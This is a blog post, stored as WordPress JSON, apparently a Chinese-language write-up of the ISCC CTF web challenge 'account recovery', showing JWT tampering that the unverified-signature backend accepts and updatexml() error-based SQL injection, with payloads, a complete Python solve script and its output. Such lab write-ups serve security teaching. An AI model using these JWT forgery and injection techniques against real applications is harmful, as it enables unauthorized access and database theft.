{"id":13,"date":"2026-05-20T19:44:43","date_gmt":"2026-05-20T11:44:43","guid":{"rendered":"http:\/\/tangjin.xyz\/?p=13"},"modified":"2026-05-21T18:52:31","modified_gmt":"2026-05-21T10:52:31","slug":"iscc%e8%b4%a6%e5%8f%b7%e6%81%a2%e5%a4%8d%e5%a4%a7%e5%86%92%e9%99%a9%e5%85%b3%e9%94%ae","status":"publish","type":"post","link":"http:\/\/tangjin.xyz\/index.php\/2026\/05\/20\/iscc%e8%b4%a6%e5%8f%b7%e6%81%a2%e5%a4%8d%e5%a4%a7%e5%86%92%e9%99%a9%e5%85%b3%e9%94%ae\/","title":{"rendered":"iscc\u8d26\u53f7\u6062\u590d\u5927\u5192\u9669\u5173\u952e"},"content":{"rendered":"\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>title: &#8220;\u8d26\u53f7\u6062\u590d&#8221;<br>ctf: &#8220;ISCC&#8221;<br>date: 2026-05-16<br>category: web<br>difficulty: medium<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">flag_format: &#8220;ISCC{\u2026}&#8221;<\/h2>\n\n\n\n<h1 class=\"wp-block-heading\">\u8d26\u53f7\u6062\u590d<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">Summary<\/h2>\n\n\n\n<p>\u9898\u76ee\u63d0\u793a\u201c\u8d26\u53f7\u767b\u5f55\u4e0d\u4e0a\u4e86\uff0c\u8be5\u600e\u4e48\u6062\u590d\u201d\uff0c\u5b9e\u9645\u8003\u70b9\u662f\u6062\u590d\u6d41\u7a0b\u4e2d\u7684\u9274\u6743\u7f3a\u9677\u548c\u540e\u7aef SQL \u6ce8\u5165\u3002\u767b\u5f55\u540e\u670d\u52a1\u7aef\u53d1\u653e JWT\uff0c\u4f46\u540e\u7aef\u6ca1\u6709\u4e25\u683c\u6821\u9a8c JWT \u7b7e\u540d\uff0c\u5bfc\u81f4\u53ef\u4ee5\u7be1\u6539 <code>status<\/code> \u5b57\u6bb5\u8fdb\u5165\u9690\u85cf\u7684 <code>\/recovery<\/code> \u6062\u590d\u9875\u9762\uff1b\u968f\u540e\u5229\u7528 <code>\/api\/v1\/user\/sync<\/code> \u63a5\u53e3\u4e2d <code>theme<\/code> \u53c2\u6570\u7684 SQL \u62a5\u9519\u6ce8\u5165\u8bfb\u53d6\u6570\u636e\u5e93\u4e2d\u7684 flag\u3002<\/p>\n\n\n\n<p>\u6700\u7ec8 flag\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ISCC{jwt_downgrade_successful_pwn!}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u73af\u5883\u4fe1\u606f<\/h2>\n\n\n\n<p>\u9776\u673a\u5730\u5740\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;39.105.213.28:5001<\/code><\/pre>\n\n\n\n<p>\u670d\u52a1\u6307\u7eb9\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Flask \/ Werkzeug<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u89e3\u9898\u8fc7\u7a0b<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">1. \u6ce8\u518c\u666e\u901a\u8d26\u53f7\u5e76\u89c2\u5bdf JWT<\/h3>\n\n\n\n<p>\u8bbf\u95ee\u9996\u9875\u540e\u53d1\u73b0\u53ea\u6709\u767b\u5f55\u548c\u6ce8\u518c\u529f\u80fd\uff0c\u6ca1\u6709\u660e\u663e\u7684\u8d26\u53f7\u627e\u56de\u5165\u53e3\u3002\u5148\u6ce8\u518c\u4e00\u4e2a\u666e\u901a\u8d26\u53f7\u5e76\u767b\u5f55\uff0c\u767b\u5f55\u6210\u529f\u540e\u8fd4\u56de JWT\u3002<\/p>\n\n\n\n<p>\u89e3\u7801 JWT \u540e\u53ef\u4ee5\u770b\u5230\u7c7b\u4f3c\u5982\u4e0b\u5b57\u6bb5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\n  \"uid\": 1,\n  \"username\": \"test\",\n  \"status\": \"NORMAL\",\n  \"exp\": 1770000000\n}<\/code><\/pre>\n\n\n\n<p>\u5176\u4e2d <code>status<\/code> \u5f88\u53ef\u7591\uff0c\u56e0\u4e3a\u9898\u76ee\u63cf\u8ff0\u5f3a\u8c03\u201c\u6062\u590d\u8d26\u53f7\u201d\u3002\u7ee7\u7eed\u67e5\u770b\u524d\u7aef\u9759\u6001\u8d44\u6e90\u65f6\uff0c\u53d1\u73b0 CSS \u4e2d\u5b58\u5728 <code>.recovery<\/code>\u3001\u4e34\u65f6\u51ed\u8bc1\u3001\u9a8c\u8bc1\u6b65\u9aa4\u7b49\u6837\u5f0f\uff0c\u8bf4\u660e\u5e94\u7528\u91cc\u5b58\u5728\u9690\u85cf\u6062\u590d\u9875\u9762\u3002<\/p>\n\n\n\n<p>\u76f4\u63a5\u8bbf\u95ee\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/recovery<\/code><\/pre>\n\n\n\n<p>\u666e\u901a\u8d26\u53f7\u4f1a\u88ab\u91cd\u5b9a\u5411\u56de\u63a7\u5236\u53f0\uff0c\u8bf4\u660e\u8be5\u9875\u9762\u4f9d\u8d56 JWT \u4e2d\u7684\u67d0\u79cd\u6062\u590d\u72b6\u6001\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">2. \u7be1\u6539 JWT \u8fdb\u5165\u6062\u590d\u9875\u9762<\/h3>\n\n\n\n<p>\u5c1d\u8bd5\u5c06 JWT payload \u4e2d\u7684\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>status=NORMAL<\/code><\/pre>\n\n\n\n<p>\u6539\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>status=RECOVERY<\/code><\/pre>\n\n\n\n<p>\u7136\u540e\u91cd\u65b0\u62fc\u56de JWT\u3002\u7531\u4e8e\u540e\u7aef\u6ca1\u6709\u4e25\u683c\u6821\u9a8c\u7b7e\u540d\uff0c\u7be1\u6539\u540e\u7684 token \u4ecd\u7136\u88ab\u63a5\u53d7\uff0c\u53ef\u4ee5\u6210\u529f\u8fdb\u5165 <code>\/recovery<\/code>\u3002<\/p>\n\n\n\n<p>\u8fdb\u5165\u6062\u590d\u9875\u9762\u540e\uff0c\u9875\u9762\u7ed9\u51fa\u4e34\u65f6\u8d26\u53f7\u4fe1\u606f\uff0c\u5e76\u63d0\u793a\u901a\u8fc7 <code>theme<\/code> \u503c\u8fdb\u884c\u9a8c\u8bc1\u3002\u8fd9\u91cc\u7ee7\u7eed\u8ddf\u8e2a\u8bf7\u6c42\uff0c\u53d1\u73b0\u6062\u590d\u9875\u4f1a\u8c03\u7528\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/api\/v1\/user\/sync<\/code><\/pre>\n\n\n\n<p>\u8bf7\u6c42\u4f53\u4e2d\u5b58\u5728 <code>theme<\/code> \u53c2\u6570\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">3. \u53d1\u73b0 theme \u53c2\u6570 SQL \u62a5\u9519\u6ce8\u5165<\/h3>\n\n\n\n<p>\u5bf9 <code>theme<\/code> \u4f20\u5165\u5355\u5f15\u53f7\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>'<\/code><\/pre>\n\n\n\n<p>\u63a5\u53e3\u8fd4\u56de SQL \u62a5\u9519\u4fe1\u606f\uff0c\u8bf4\u660e\u53c2\u6570\u88ab\u76f4\u63a5\u62fc\u63a5\u8fdb SQL \u8bed\u53e5\u3002<\/p>\n\n\n\n<p>\u7ee7\u7eed\u4f7f\u7528 MariaDB\/MySQL \u5e38\u89c1\u7684 <code>updatexml()<\/code> \u62a5\u9519\u6ce8\u5165\u8fdb\u884c\u6570\u636e\u8bfb\u53d6\uff0c\u4f8b\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>' and updatexml(1, concat(0x7e, database(), 0x7e), 1) and '<\/code><\/pre>\n\n\n\n<p>\u8fd4\u56de\u4fe1\u606f\u4e2d\u53ef\u4ee5\u5f97\u5230\u5f53\u524d\u6570\u636e\u5e93\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>jwt_downgrade<\/code><\/pre>\n\n\n\n<p>\u679a\u4e3e\u8868\u540d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>' and updatexml(1, concat(0x7e, (\n  select group_concat(table_name)\n  from information_schema.tables\n  where table_schema=database()\n), 0x7e), 1) and '<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230\u5173\u952e\u8868\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>users,temp_credentials,flags<\/code><\/pre>\n\n\n\n<p>\u679a\u4e3e <code>flags<\/code> \u8868\u5b57\u6bb5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>' and updatexml(1, concat(0x7e, (\n  select group_concat(column_name)\n  from information_schema.columns\n  where table_schema=database()\n  and table_name='flags'\n), 0x7e), 1) and '<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230\u5b57\u6bb5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>id,flag<\/code><\/pre>\n\n\n\n<p>\u7531\u4e8e <code>updatexml()<\/code> \u62a5\u9519\u56de\u663e\u957f\u5ea6\u6709\u9650\uff0c\u8bfb\u53d6 flag \u65f6\u9700\u8981\u7528 <code>substr()<\/code> \u5206\u6bb5\u8bfb\u53d6\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">SQL \u6ce8\u5165\u811a\u672c<\/h2>\n\n\n\n<p>\u4e0b\u9762\u811a\u672c\u4f1a\u5b8c\u6210\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u6ce8\u518c\/\u767b\u5f55\u666e\u901a\u8d26\u53f7\uff1b<\/li>\n\n\n\n<li>\u89e3\u7801 JWT\uff1b<\/li>\n\n\n\n<li>\u5c06 <code>status<\/code> \u6539\u6210 <code>RECOVERY<\/code>\uff1b<\/li>\n\n\n\n<li>\u4f7f\u7528\u4f2a\u9020 JWT \u8c03\u7528 <code>\/api\/v1\/user\/sync<\/code>\uff1b<\/li>\n\n\n\n<li>\u901a\u8fc7 <code>updatexml()<\/code> \u62a5\u9519\u6ce8\u5165\u5206\u6bb5\u8bfb\u53d6 <code>flags.flag<\/code>\u3002<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>import argparse\nimport base64\nimport json\nimport random\nimport re\nimport string\nimport time\n\nimport requests\n\n\ndef b64url_decode(data: str) -&gt; bytes:\n    data += \"=\" * (-len(data) % 4)\n    return base64.urlsafe_b64decode(data.encode())\n\n\ndef b64url_encode(data: bytes) -&gt; str:\n    return base64.urlsafe_b64encode(data).decode().rstrip(\"=\")\n\n\ndef forge_recovery_jwt(token: str) -&gt; str:\n    header_b64, payload_b64, signature_b64 = token.split(\".\")\n    payload = json.loads(b64url_decode(payload_b64))\n    payload&#91;\"status\"] = \"RECOVERY\"\n    payload&#91;\"exp\"] = int(time.time()) + 3600\n    new_payload_b64 = b64url_encode(\n        json.dumps(payload, separators=(\",\", \":\")).encode()\n    )\n    return f\"{header_b64}.{new_payload_b64}.{signature_b64}\"\n\n\ndef randstr(n=8):\n    alphabet = string.ascii_lowercase + string.digits\n    return \"\".join(random.choice(alphabet) for _ in range(n))\n\n\ndef get_token(base_url: str, session: requests.Session) -&gt; str:\n    username = \"ctf_\" + randstr()\n    password = \"Pass12345_\" + randstr()\n\n    # \u6ce8\u518c\uff08\u8868\u5355 POST\uff09\n    session.post(\n        f\"{base_url}\/register\",\n        data={\"username\": username, \"password\": password},\n        timeout=8,\n    )\n\n    # \u767b\u5f55\uff08\u8868\u5355 POST\uff0cJWT \u5728 cookie \u4e2d\uff09\n    session.post(\n        f\"{base_url}\/login\",\n        data={\"username\": username, \"password\": password},\n        timeout=8,\n    )\n\n    token = session.cookies.get(\"token\")\n    if not token:\n        raise RuntimeError(\"\u767b\u5f55\u540e\u672a\u5728 cookie \u4e2d\u627e\u5230 token\")\n    return token\n\n\ndef extract_error_value(resp_text: str) -&gt; str:\n    # updatexml \u62a5\u9519\u4e2d\u5e38\u89c1\u5f62\u6001\uff1aXPATH syntax error: '~data~'\n    m = re.search(r\"~(&#91;^~]+)~\", resp_text)\n    if m:\n        return m.group(1)\n\n    # \u90e8\u5206\u6846\u67b6\u4f1a JSON \u8f6c\u4e49\u6216\u53ea\u8fd4\u56de\u5c40\u90e8\u9519\u8bef\uff0c\u8fd9\u91cc\u7ed9\u4e00\u4e2a\u515c\u5e95\u3002\n    m = re.search(r\"XPATH syntax error:\\s*'(&#91;^']+)'\", resp_text, re.I)\n    if m:\n        return m.group(1).strip(\"~\")\n\n    return resp_text&#91;:200]\n\n\ndef sqli(base_url: str, token: str, expr: str) -&gt; str:\n    payload = f\"' and updatexml(1,concat(0x7e,({expr}),0x7e),1) and '\"\n\n    # \u7528\u65b0 session\uff0c\u53ea\u5e26 forged cookie\uff08\u670d\u52a1\u5668\u4ece cookie \u8bfb\u53d6 JWT\uff09\n    s = requests.Session()\n    s.trust_env = False\n    s.cookies.set(\"token\", token, domain=\"\", path=\"\/\")\n\n    r = s.post(\n        f\"{base_url}\/api\/v1\/user\/sync\",\n        headers={\"Content-Type\": \"application\/json\"},\n        json={\"theme\": payload},\n        timeout=8,\n        allow_redirects=False,\n    )\n    return extract_error_value(r.text)\n\n\ndef read_flag(base_url: str, token: str) -&gt; str:\n    flag = \"\"\n    # updatexml \u5355\u6b21\u56de\u663e\u8f83\u77ed\uff0c16 \u5b57\u7b26\u4e00\u6bb5\u66f4\u7a33\u3002\n    step = 16\n    for pos in range(1, 200, step):\n        expr = f\"select substr((select flag from flags limit 1),{pos},{step})\"\n        chunk = sqli(base_url, token, expr)\n        if not chunk:\n            break\n        flag += chunk\n        print(f\"&#91;+] chunk @{pos}: {chunk}\")\n        if \"}\" in flag:\n            break\n    return flag\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--url\", default=\"http:\/\/39.105.213.28:5001\")\n    parser.add_argument(\"--proxy\", default=None, help=\"\u4f8b\u5982 http:\/\/127.0.0.1:7890\")\n    args = parser.parse_args()\n\n    base_url = args.url.rstrip(\"\/\")\n    session = requests.Session()\n    session.trust_env = False\n\n    if args.proxy:\n        session.proxies.update({\"http\": args.proxy, \"https\": args.proxy})\n\n    token = get_token(base_url, session)\n    print(\"&#91;+] normal jwt:\", token)\n\n    forged = forge_recovery_jwt(token)\n    print(\"&#91;+] forged recovery jwt:\", forged)\n\n    db = sqli(base_url, forged, \"select database()\")\n    print(\"&#91;+] database:\", db)\n\n    tables = sqli(\n        base_url,\n        forged,\n        \"select group_concat(table_name) \"\n        \"from information_schema.tables \"\n        \"where table_schema=database()\",\n    )\n    print(\"&#91;+] tables:\", tables)\n\n    flag = read_flag(base_url, forged)\n    print(\"&#91;+] flag:\", flag)\n\n\nif __name__ == \"__main__\":\n    main()<\/code><\/pre>\n\n\n\n<p>\u8fd0\u884c\u793a\u4f8b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python solve.py --url http:\/\/39.105.213.28:5001 --proxy http:\/\/127.0.0.1:7890<\/code><\/pre>\n\n\n\n<p>\u8f93\u51fa\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;+] database: jwt_downgrade\n&#91;+] tables: users,temp_credentials,flags\n&#91;+] chunk @1: ISCC{jwt_downg\n&#91;+] chunk @17: rade_successful\n&#91;+] chunk @33: _pwn!}\n&#91;+] flag: ISCC{jwt_downgrade_successful_pwn!}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>ISCC{jwt_downgrade_successful_pwn!}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>title: &#8220;\u8d26\u53f7\u6062\u590d&#8221;ctf: &#8220;ISCC&#8221;date: 2 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-13","post","type-post","status-publish","format-standard","hentry","category-ctf-wp"],"_links":{"self":[{"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/posts\/13","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/comments?post=13"}],"version-history":[{"count":2,"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/posts\/13\/revisions"}],"predecessor-version":[{"id":16,"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/posts\/13\/revisions\/16"}],"wp:attachment":[{"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/media?parent=13"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/categories?post=13"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/tangjin.xyz\/index.php\/wp-json\/wp\/v2\/tags?post=13"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}